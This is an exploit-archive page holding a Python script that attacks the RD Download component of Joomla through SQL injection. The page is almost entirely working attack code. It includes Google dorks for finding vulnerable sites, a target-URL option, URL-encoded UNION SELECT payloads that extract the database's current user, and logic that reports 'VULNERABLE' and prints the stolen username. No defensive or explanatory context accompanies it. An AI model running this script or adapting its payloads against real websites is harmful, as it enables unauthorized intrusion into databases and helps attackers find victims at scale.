Home / exploitsPDF  

Joomla RD Download SQL Injection

Posted on 31 October 2014

#!/usr/bin/python # # Exploit Name: Joomla RD Download SQL Injection # # Version: Unknown # # Exploit discovered and written by Claudio Viviani # # Dork google 1: inurl:index.php?option=com_rd_download # Dork google 2: inurl:/component/rd_download/ # # Tested on BackBox 3.x # # http connection import urllib, urllib2 # string manipulation import re # Errors management import sys # Args management import optparse # Check url def checkurl(url): if url[:8] != "https://" and url[:7] != "http://": print('[X] You must insert http:// or https:// procotol') sys.exit(1) else: return url banner = """ _______ __ | _ .-----.-----.--------| .---.-. |___| | _ | _ | | | _ | |. | |_____|_____|__|__|__|__|___._| |: 1 | |::.. . | `-------' _______ ______ ______ __ __ | _ | _ | _ .-----.--.--.--.-----| .-----.---.-.--| | |. l |. | |. | | _ | | | | | | _ | _ | _ | |. _ |. | |. | |_____|________|__|__|__|_____|___._|_____| |: | |: 1 / |: 1 / |::.|:. |::.. . / |::.. . / `--- ---`------' `------' J00ml4 RD D0wnl04d Sql1nj3ct10n Written by: Claudio Viviani http://www.homelab.it info@homelab.it homelabit@protonmail.ch https://www.facebook.com/homelabit https://twitter.com/homelabit https://plus.google.com/+HomelabIt1/ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww """ commandList = optparse.OptionParser('usage: %prog -t URL') commandList.add_option('-t', '--target', action="store", help="Insert TARGET URL: http[s]://www.victim.com[:PORT]", ) options, remainder = commandList.parse_args() # Check args if not options.target: print(banner) commandList.print_help() sys.exit(1) host = checkurl(options.target) evilurl = { '/component/rd_download/?view=download&task=dl&id=-5469%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%23' : '/component/rd_download/?view=download&task=dl&id=[SQLi]', '/index.php?option=com_rd_download&view=download&task=dl&id=-5469%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x68306d336c34623174%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x743162346c336d3068%29%2CNULL%2CNULL%23' : '/index.php?option=com_rd_download&view=download&task=dl&id=[SQLi]' } print(banner) headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'} for exploiting, dork in evilurl.iteritems(): print "[*] Trying to connect to: "+host+dork try: req = urllib2.Request(host+exploiting, None, headers) response = urllib2.urlopen(req) response_header = response.info().getheader('Content-Disposition') if response_header: if "h0m3l4b1t" in response_header: print "[!] VULNERABLE" current_user = re.compile('h0m3l4b1t(.*?)t1b4l3m0h').search(response_header).group(1) print "[*] Username: "+str(current_user) sys.exit(0) else: print "[X] Not vulnerable :(" else: print "[X] Not vulnerable :(" except urllib2.HTTPError as e: print("[X] Http Error: "+str(e.code)) except urllib2.URLError as e: print("[X] Connection Error: "+str(e.code)) sys.exit(1)

 

TOP